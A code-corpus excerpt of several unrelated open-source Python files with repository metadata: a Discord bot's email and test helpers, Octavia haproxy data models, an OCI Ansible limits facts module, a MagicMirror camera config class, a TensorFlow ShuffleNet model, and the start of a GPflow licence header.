"MIT"
] | null | null | null |
test/utils.py
|
chandur626/TeachersPetBot
|
ad1fd36be5bd3690949d0e3a6e29c9100bf43e15
|
[
"MIT"
] | 52
|
2021-11-20T19:29:58.000Z
|
2021-12-05T04:39:30.000Z
|
test/utils.py
|
chandur626/TeachersPetBot
|
ad1fd36be5bd3690949d0e3a6e29c9100bf43e15
|
[
"MIT"
] | null | null | null |
import os
import smtplib
from email import encoders
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from dotenv import load_dotenv
import asyncio
from time import sleep
load_dotenv()
DICORD_BOT_NAME = os.getenv('DICORD_BOT_NAME')
class EmailUtility:
"""
Class provides methods handling mailing logic of attachments and remainders
"""
def __init__(self):
# Accepting username and password from env file.
self.username = os.getenv("USERNAME")
self.password = os.getenv("PASSWORD")
self.from_address = 'no-reply@teacherspetbot.com'
self.subject = 'TEACHERS PET BOT NOTIFICATION'
self.output_message = ''
def send_email(self, recipient: list, attachment=None, subject: str = '', body: str = '',
filename: str = ''):
"""
Sends email to the specified recipients.
Parameters:
recipient: user email address.
attachment: file attachments.
subject: subject of the email.
body: body of the email.
filename: specifies the file name it should use for attachment data.
Returns:
returns either an error stating a reason for failure or returns a success message
indicating that the reminder has been added
"""
# Recipient address are to be provided as list.
to_address = recipient if isinstance(recipient, list) else [recipient]
msg = MIMEMultipart()
msg['Subject'] = subject if subject else self.subject
msg['From'] = self.from_address
msg['To'] = ''.join(to_address)
body = body if body else "This mail was sent from TeachersPetBot notification service," \
" Please unsubscribe through bot to stop notifications."
msg.attach(MIMEText(body, 'plain'))
if attachment:
# Attaching the attachment data only if it exists.
part = MIMEBase('application', "octet-stream")
part.set_payload(attachment)
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment', filename=filename)
msg.attach(part)
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(self.username, self.password)
server.sendmail(list(self.from_address), to_address, msg.as_string())
server.close()
self.output_message = "successfully sent the mail to " + ''.join(recipient)
print(self.output_message)
except Exception as error:
with open("err.log", "a", encoding='utf8') as f:
f.write(f"Error while sending email : {str(error)}\n")
raise error
async def wait_for_msg(testing_bot, channel, content):
sleep(0.6)
try:
return await testing_bot.wait_for('message', timeout=2, check=lambda x: x.guild.id == channel.guild.id and x.author.name == DICORD_BOT_NAME and content in x.content)
except asyncio.TimeoutError:
messages = await channel.history(limit=1).flatten()
if not (len(messages) != 0 and content in messages[0].content):
print(f'Message content {content} not found')
raise Exception()
return messages[0]
async def wait_for_channel_create(testing_bot, guild_id, name):
try:
return await testing_bot.wait_for('guild_channel_create', timeout=2, check=lambda x: x.guild.id == guild_id and x.name == name)
except asyncio.TimeoutError:
new_channel = next((ch for ch in testing_bot.get_guild(guild_id).text_channels if ch.name == name), None)
if new_channel is None:
print(f'Channel {name} not found')
raise Exception()
return new_channel
| 39.6
| 173
| 0.629798
|
627d58e4503f19b296d52a4b977014d18343ae5a
| 3,510
|
py
|
Python
|
zuul.d/octavia/amphorae/drivers/haproxy/data_models.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/amphorae/drivers/haproxy/data_models.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/amphorae/drivers/haproxy/data_models.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import octavia.common.data_models as models
class Topology(models.BaseDataModel):
def __init__(self, hostname=None, uuid=None, topology=None, role=None,
ip=None, ha_ip=None):
self.hostname = hostname
self.uuid = uuid
self.topology = topology
self.role = role
self.ip = ip
self.ha_ip = ha_ip
class Info(models.BaseDataModel):
def __init__(self, hostname=None, uuid=None, version=None,
api_version=None):
self.hostname = hostname
self.uuid = uuid
self.version = version
self.api_version = api_version
class Details(models.BaseDataModel):
def __init__(self, hostname=None, uuid=None, version=None,
api_version=None, network_tx=None, network_rx=None,
active=None, haproxy_count=None, cpu=None, memory=None,
disk=None, load=None, listeners=None, packages=None):
self.hostname = hostname
self.uuid = uuid
self.version = version
self.api_version = api_version
self.network_tx = network_tx
self.network_rx = network_rx
self.active = active
self.haproxy_count = haproxy_count
self.cpu = cpu
self.memory = memory
self.disk = disk
self.load = load or []
self.listeners = listeners or []
self.packages = packages or []
class CPU(models.BaseDataModel):
def __init__(self, total=None, user=None, system=None, soft_irq=None):
self.total = total
self.user = user
self.system = system
self.soft_irq = soft_irq
class Memory(models.BaseDataModel):
def __init__(self, total=None, free=None, available=None, buffers=None,
cached=None, swap_used=None, shared=None, slab=None,
committed_as=None):
self.total = total
self.free = free
self.available = available
self.buffers = buffers
self.cached = cached
self.swap_used = swap_used
self.shared = shared
self.slab = slab
self.committed_as = committed_as
class Disk(models.BaseDataModel):
def __init__(self, used=None, available=None):
self.used = used
self.available = available
class ListenerStatus(models.BaseDataModel):
def __init__(self, status=None, uuid=None, provisioning_status=None,
type=None, pools=None):
self.status = status
self.uuid = uuid
self.provisioning_status = provisioning_status
self.type = type
self.pools = pools or []
class Pool(models.BaseDataModel):
def __init__(self, uuid=None, status=None, members=None):
self.uuid = uuid
self.status = status
self.members = members or []
| 31.621622
| 79
| 0.619658
|
d2fd51501c7b3ef81d62f72d84778d72fe0ecc89
| 7,277
|
py
|
Python
|
plugins/modules/oci_limits_limit_definition_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_limits_limit_definition_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_limits_limit_definition_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_limits_limit_definition_facts
short_description: Fetches details about one or multiple LimitDefinition resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple LimitDefinition resources in Oracle Cloud Infrastructure
- Includes a list of resource limits that are currently supported.
If the 'areQuotasSupported' property is true, you can create quota policies on top of this limit at the
compartment level.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
compartment_id:
description:
- The OCID of the parent compartment (remember that the tenancy is simply the root compartment).
type: str
required: true
service_name:
description:
- The target service name.
type: str
name:
description:
- Optional field, filter for a specific resource limit.
type: str
sort_by:
description:
- The field to sort by.
type: str
choices:
- "name"
- "description"
sort_order:
description:
- The sort order to use, either 'asc' or 'desc'. By default, it is ascending.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: List limit_definitions
oci_limits_limit_definition_facts:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
# optional
service_name: service_name_example
name: name_example
sort_by: name
sort_order: ASC
"""
RETURN = """
limit_definitions:
description:
- List of LimitDefinition resources
returned: on success
type: complex
contains:
name:
description:
- The resource limit name. To be used for writing policies (in case of quotas) or other programmatic calls.
returned: on success
type: str
sample: name_example
service_name:
description:
- The service name of the limit.
returned: on success
type: str
sample: service_name_example
description:
description:
- The limit description.
returned: on success
type: str
sample: description_example
scope_type:
description:
- Reflects the scope of the resource limit, whether Global (across all regions), regional, or availability domain-specific.
returned: on success
type: str
sample: GLOBAL
are_quotas_supported:
description:
- If true, quota policies can be created on top of this resource limit.
returned: on success
type: bool
sample: true
is_resource_availability_supported:
description:
- Reflects whether or not the GetResourceAvailability API is supported for this limit.
If not, the API returns an empty JSON response.
returned: on success
type: bool
sample: true
is_deprecated:
description:
- Indicates if the limit has been deprecated.
returned: on success
type: bool
sample: true
is_eligible_for_limit_increase:
description:
- Indicates if the customer can request a limit increase for this resource.
returned: on success
type: bool
sample: true
is_dynamic:
description:
- The limit for this resource has a dynamic value that is based on consumption across all OCI services.
returned: on success
type: bool
sample: true
sample: [{
"name": "name_example",
"service_name": "service_name_example",
"description": "description_example",
"scope_type": "GLOBAL",
"are_quotas_supported": true,
"is_resource_availability_supported": true,
"is_deprecated": true,
"is_eligible_for_limit_increase": true,
"is_dynamic": true
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.limits import LimitsClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class LimitDefinitionFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: list"""
def get_required_params_for_list(self):
return [
"compartment_id",
]
def list_resources(self):
optional_list_method_params = [
"service_name",
"name",
"sort_by",
"sort_order",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_limit_definitions,
compartment_id=self.module.params.get("compartment_id"),
**optional_kwargs
)
LimitDefinitionFactsHelperCustom = get_custom_class("LimitDefinitionFactsHelperCustom")
class ResourceFactsHelper(
LimitDefinitionFactsHelperCustom, LimitDefinitionFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
compartment_id=dict(type="str", required=True),
service_name=dict(type="str"),
name=dict(type="str"),
sort_by=dict(type="str", choices=["name", "description"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="limit_definition",
service_client_class=LimitsClient,
namespace="limits",
)
result = []
if resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(limit_definitions=result)
if __name__ == "__main__":
main()
| 30.57563
| 139
| 0.632266
|
7c5eb134da89a9ce485d00100d4055dca4f99fc3
| 2,741
|
py
|
Python
|
lib/mm/config.py
|
ferferga/MMM-NEXT-FacialRecognition
|
90159182de2a944b041581e16b707c4551385690
|
[
"MIT"
] | null | null | null |
lib/mm/config.py
|
ferferga/MMM-NEXT-FacialRecognition
|
90159182de2a944b041581e16b707c4551385690
|
[
"MIT"
] | null | null | null |
lib/mm/config.py
|
ferferga/MMM-NEXT-FacialRecognition
|
90159182de2a944b041581e16b707c4551385690
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding: utf8
"""MMM-Facial-Recognition-OCV3 - MagicMirror Module
The MIT License (MIT)
Copyright (c) 2018 Mathieu Goulène (MIT License)
Based on work by Paul-Vincent Roll (Copyright 2016) (MIT License)
"""
import os
import json
import sys
import platform
sys.path.append((os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))+ '/common/'))
from commonconfig import CommonConfig
from face import FaceDetection
class MMConfig (CommonConfig):
CONFIG_DATA = json.loads(sys.argv[1]);
THRESHOLD_ATTR = 'threshold'
USE_USB_CAM_ATTR = 'useUSBCam'
TRAINING_FILE_ATTR = 'trainingFile'
INTERVAL_ATTR = 'interval'
LOGOUT_DELAY_ATTR = 'logoutDelay'
USERS_ATTR = 'users'
DEFAULT_CLASS_ATTR = 'defaultClass'
EVERYONE_CLASS_ATTR = 'everyoneClass'
WELCOME_MESSAGE_ATTR = 'welcomeMessage'
@classmethod
def toNode(cls, type, message):
print(json.dumps({type: message}))
sys.stdout.flush()
@classmethod
def getTrainingFile(cls):
return cls.get(cls.TRAINING_FILE_ATTR)
@classmethod
def getInterval(cls):
return cls.get(cls.INTERVAL_ATTR)
@classmethod
def getLogoutDelay(cls):
return cls.get(cls.LOGOUT_DELAY_ATTR)
@classmethod
def getUsers(cls):
return cls.get(cls.USERS_ATTR)
@classmethod
def getDefaultClass(cls):
return cls.get(cls.DEFAULT_CLASS_ATTR)
@classmethod
def getEveryoneClass(cls):
return cls.get(cls.EVERYONE_CLASS_ATTR)
@classmethod
def getWelcomeMessage(cls):
return cls.get(cls.WELCOME_MESSAGE_ATTR)
@classmethod
def getUseUSBCam(cls):
return cls.get(cls.USE_USB_CAM_ATTR)
@classmethod
def getThreshold(cls):
return cls.get(cls.THRESHOLD_ATTR)
@classmethod
def get(cls,key):
return cls.CONFIG_DATA[key]
@classmethod
def getCamera(cls):
cls.toNode("status", "-" * 20)
try:
if cls.get("useUSBCam") == False:
try:
import picam
cam = picam.OpenCVCapture()
cam.start()
cls.toNode("status", "PiCam loaded...")
return cam
except:
cls.toNode("status", "Error while loading camera.")
else:
raise Exception
except Exception:
try:
import webcam
cls.toNode("status", "Webcam loaded...")
return webcam.OpenCVCapture(device_id=0)
except:
cls.toNode("status", "Error while loading camera.")
cls.toNode("status", "-" * 20)
| 27.41
| 93
| 0.604524
|
786394b47c67b59385315aace07545cc9898841f
| 19,668
|
py
|
Python
|
tensorflow_/tensorflowcv/models/shufflenet.py
|
huangwenwenlili/imgclsmob
|
1505fd61acbed429773f5c7ce286c858fc2278b8
|
[
"MIT"
] | 1
|
2021-01-08T04:55:45.000Z
|
2021-01-08T04:55:45.000Z
|
tensorflow_/tensorflowcv/models/shufflenet.py
|
huangwenwenlili/imgclsmob
|
1505fd61acbed429773f5c7ce286c858fc2278b8
|
[
"MIT"
] | null | null | null |
tensorflow_/tensorflowcv/models/shufflenet.py
|
huangwenwenlili/imgclsmob
|
1505fd61acbed429773f5c7ce286c858fc2278b8
|
[
"MIT"
] | null | null | null |
"""
ShuffleNet, implemented in TensorFlow.
Original paper: 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
"""
__all__ = ['ShuffleNet', 'shufflenet_g1_w1', 'shufflenet_g2_w1', 'shufflenet_g3_w1', 'shufflenet_g4_w1',
'shufflenet_g8_w1', 'shufflenet_g1_w3d4', 'shufflenet_g3_w3d4', 'shufflenet_g1_wd2', 'shufflenet_g3_wd2',
'shufflenet_g1_wd4', 'shufflenet_g3_wd4']
import os
import tensorflow as tf
from .common import conv2d, batchnorm, channel_shuffle, maxpool2d
def depthwise_conv3x3(x,
channels,
strides,
name="depthwise_conv3x3"):
"""
Depthwise convolution 3x3 layer.
Parameters:
----------
x : Tensor
Input tensor.
channels : int
Number of input/output channels.
strides : int or tuple/list of 2 int
Strides of the convolution.
name : str, default 'depthwise_conv3x3'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv2d(
x=x,
in_channels=channels,
out_channels=channels,
kernel_size=3,
strides=strides,
padding=1,
groups=channels,
use_bias=False,
name=name)
def group_conv1x1(x,
in_channels,
out_channels,
groups,
name="group_conv1x1"):
"""
Group convolution 1x1 layer.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
groups : int
Number of groups.
name : str, default 'group_conv1x1'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
groups=groups,
use_bias=False,
name=name)
def shuffle_unit(x,
in_channels,
out_channels,
groups,
downsample,
ignore_group,
training,
name="shuffle_unit"):
"""
ShuffleNet unit.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
groups : int
Number of groups in convolution layers.
downsample : bool
Whether do downsample.
ignore_group : bool
Whether ignore group value in the first convolution layer.
training : bool, or a TensorFlow boolean scalar tensor
Whether to return the output in training mode or in inference mode.
name : str, default 'shuffle_unit'
Unit name.
Returns
-------
Tensor
Resulted tensor.
"""
mid_channels = out_channels // 4
if downsample:
out_channels -= in_channels
identity = x
x = group_conv1x1(
x=x,
in_channels=in_channels,
out_channels=mid_channels,
groups=(1 if ignore_group else groups),
name=name + "/compress_conv1")
x = batchnorm(
x=x,
training=training,
name=name + "/compress_bn1")
x = tf.nn.relu(x, name=name + "/activ")
x = channel_shuffle(
x=x,
groups=groups)
x = depthwise_conv3x3(
x=x,
channels=mid_channels,
strides=(2 if downsample else 1),
name=name + "/dw_conv2")
x = batchnorm(
x=x,
training=training,
name=name + "/dw_bn2")
x = group_conv1x1(
x=x,
in_channels=mid_channels,
out_channels=out_channels,
groups=groups,
name=name + "/expand_conv3")
x = batchnorm(
x=x,
training=training,
name=name + "/expand_bn3")
if downsample:
identity = tf.layers.average_pooling2d(
inputs=identity,
pool_size=3,
strides=2,
padding='same',
data_format='channels_first',
name=name + "/avgpool")
x = tf.concat([x, identity], axis=1, name=name + "/concat")
else:
x = x + identity
x = tf.nn.relu(x, name=name + "/final_activ")
return x
def shuffle_init_block(x,
in_channels,
out_channels,
training,
name="shuffle_init_block"):
"""
ShuffleNet specific initial block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
training : bool, or a TensorFlow boolean scalar tensor
Whether to return the output in training mode or in inference mode.
name : str, default 'shuffle_init_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
x = conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=3,
strides=2,
padding=1,
use_bias=False,
name=name + "/conv")
x = batchnorm(
x=x,
training=training,
name=name + "/bn")
x = tf.nn.relu(x, name=name + "/activ")
x = maxpool2d(
x=x,
pool_size=3,
strides=2,
padding=1,
name=name + "/pool")
return x
class ShuffleNet(object):
"""
ShuffleNet model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
channels : list of list of int
Number of output channels for each unit.
init_block_channels : int
Number of output channels for the initial unit.
groups : int
Number of groups in convolution layers.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
def __init__(self,
channels,
init_block_channels,
groups,
in_channels=3,
in_size=(224, 224),
classes=1000,
**kwargs):
super(ShuffleNet, self).__init__(**kwargs)
self.channels = channels
self.init_block_channels = init_block_channels
self.groups = groups
self.in_channels = in_channels
self.in_size = in_size
self.classes = classes
def __call__(self,
x,
training=False):
"""
Build a model graph.
Parameters:
----------
x : Tensor
Input tensor.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
Returns
-------
Tensor
Resulted tensor.
"""
in_channels = self.in_channels
x = shuffle_init_block(
x=x,
in_channels=in_channels,
out_channels=self.init_block_channels,
training=training,
name="features/init_block")
in_channels = self.init_block_channels
for i, channels_per_stage in enumerate(self.channels):
for j, out_channels in enumerate(channels_per_stage):
downsample = (j == 0)
ignore_group = (i == 0) and (j == 0)
x = shuffle_unit(
x=x,
in_channels=in_channels,
out_channels=out_channels,
groups=self.groups,
downsample=downsample,
ignore_group=ignore_group,
training=training,
name="features/stage{}/unit{}".format(i + 1, j + 1))
in_channels = out_channels
x = tf.layers.average_pooling2d(
inputs=x,
pool_size=7,
strides=1,
data_format='channels_first',
name="features/final_pool")
x = tf.layers.flatten(x)
x = tf.layers.dense(
inputs=x,
units=self.classes,
name="output")
return x
def get_shufflenet(groups,
width_scale,
model_name=None,
pretrained=False,
root=os.path.join('~', '.tensorflow', 'models'),
**kwargs):
"""
Create ShuffleNet model with specific parameters.
Parameters:
----------
groups : int
Number of groups in convolution layers.
width_scale : float
Scale factor for width of layers.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
init_block_channels = 24
layers = [4, 8, 4]
if groups == 1:
channels_per_layers = [144, 288, 576]
elif groups == 2:
channels_per_layers = [200, 400, 800]
elif groups == 3:
channels_per_layers = [240, 480, 960]
elif groups == 4:
channels_per_layers = [272, 544, 1088]
elif groups == 8:
channels_per_layers = [384, 768, 1536]
else:
raise ValueError("The {} of groups is not supported".format(groups))
channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]
if width_scale != 1.0:
channels = [[int(cij * width_scale) for cij in ci] for ci in channels]
init_block_channels = int(init_block_channels * width_scale)
net = ShuffleNet(
channels=channels,
init_block_channels=init_block_channels,
groups=groups,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import download_state_dict
net.state_dict, net.file_path = download_state_dict(
model_name=model_name,
local_model_store_dir_path=root)
else:
net.state_dict = None
net.file_path = None
return net
def shufflenet_g1_w1(**kwargs):
"""
ShuffleNet 1x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=1.0, model_name="shufflenet_g1_w1", **kwargs)
def shufflenet_g2_w1(**kwargs):
"""
ShuffleNet 1x (g=2) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=2, width_scale=1.0, model_name="shufflenet_g2_w1", **kwargs)
def shufflenet_g3_w1(**kwargs):
"""
ShuffleNet 1x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=1.0, model_name="shufflenet_g3_w1", **kwargs)
def shufflenet_g4_w1(**kwargs):
"""
ShuffleNet 1x (g=4) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=4, width_scale=1.0, model_name="shufflenet_g4_w1", **kwargs)
def shufflenet_g8_w1(**kwargs):
"""
ShuffleNet 1x (g=8) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=8, width_scale=1.0, model_name="shufflenet_g8_w1", **kwargs)
def shufflenet_g1_w3d4(**kwargs):
"""
ShuffleNet 0.75x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=0.75, model_name="shufflenet_g1_w3d4", **kwargs)
def shufflenet_g3_w3d4(**kwargs):
"""
ShuffleNet 0.75x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=0.75, model_name="shufflenet_g3_w3d4", **kwargs)
def shufflenet_g1_wd2(**kwargs):
"""
ShuffleNet 0.5x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=0.5, model_name="shufflenet_g1_wd2", **kwargs)
def shufflenet_g3_wd2(**kwargs):
"""
ShuffleNet 0.5x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=0.5, model_name="shufflenet_g3_wd2", **kwargs)
def shufflenet_g1_wd4(**kwargs):
"""
ShuffleNet 0.25x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=0.25, model_name="shufflenet_g1_wd4", **kwargs)
def shufflenet_g3_wd4(**kwargs):
"""
ShuffleNet 0.25x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=0.25, model_name="shufflenet_g3_wd4", **kwargs)
def _test():
import numpy as np
from .model_store import init_variables_from_state_dict
pretrained = False
models = [
shufflenet_g1_w1,
shufflenet_g2_w1,
shufflenet_g3_w1,
shufflenet_g4_w1,
shufflenet_g8_w1,
shufflenet_g1_w3d4,
shufflenet_g3_w3d4,
shufflenet_g1_wd2,
shufflenet_g3_wd2,
shufflenet_g1_wd4,
shufflenet_g3_wd4,
]
for model in models:
net = model(pretrained=pretrained)
x = tf.placeholder(
dtype=tf.float32,
shape=(None, 3, 224, 224),
name='xx')
y_net = net(x)
weight_count = np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])
print("m={}, {}".format(model.__name__, weight_count))
assert (model != shufflenet_g1_w1 or weight_count == 1531936)
assert (model != shufflenet_g2_w1 or weight_count == 1733848)
assert (model != shufflenet_g3_w1 or weight_count == 1865728)
assert (model != shufflenet_g4_w1 or weight_count == 1968344)
assert (model != shufflenet_g8_w1 or weight_count == 2434768)
assert (model != shufflenet_g1_w3d4 or weight_count == 975214)
assert (model != shufflenet_g3_w3d4 or weight_count == 1238266)
assert (model != shufflenet_g1_wd2 or weight_count == 534484)
assert (model != shufflenet_g3_wd2 or weight_count == 718324)
assert (model != shufflenet_g1_wd4 or weight_count == 209746)
assert (model != shufflenet_g3_wd4 or weight_count == 305902)
with tf.Session() as sess:
if pretrained:
init_variables_from_state_dict(sess=sess, state_dict=net.state_dict)
else:
sess.run(tf.global_variables_initializer())
x_value = np.zeros((1, 3, 224, 224), np.float32)
y = sess.run(y_net, feed_dict={x: x_value})
assert (y.shape == (1, 1000))
tf.reset_default_graph()
if __name__ == "__main__":
_test()
| 29.355224
| 120
| 0.604179
|
4f98dcd1e83d700520739875761a33678eeef589
| 3,682
|
py
|
Python
|
gpflow/expectations/sums.py
|
antonykamp/GPflow
|
1831a5d19a50ff525af0ce931c8b82f6306d8196
|
[
"Apache-2.0"
] | 1,724
|
2016-01-21T18:10:26.000Z
|
2022-03-22T20:03:57.000Z
|
gpflow/expectations/sums.py
|
antonykamp/GPflow
|
1831a5d19a50ff525af0ce931c8b82f6306d8196
|
[
"Apache-2.0"
] | 1,713
|
2016-02-26T13:09:35.000Z
|
2022-03-31T14:39:30.000Z
|
gpflow/expectations/sums.py
|
antonykamp/GPflow
|
1831a5d19a50ff525af0ce931c8b82f6306d8196
|
[
"Apache-2.0"
] | 519
|
2016-02-17T19:04:45.000Z
|
2022-03-26T00:13:13.000Z
|
# Copyright 2017-2020 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
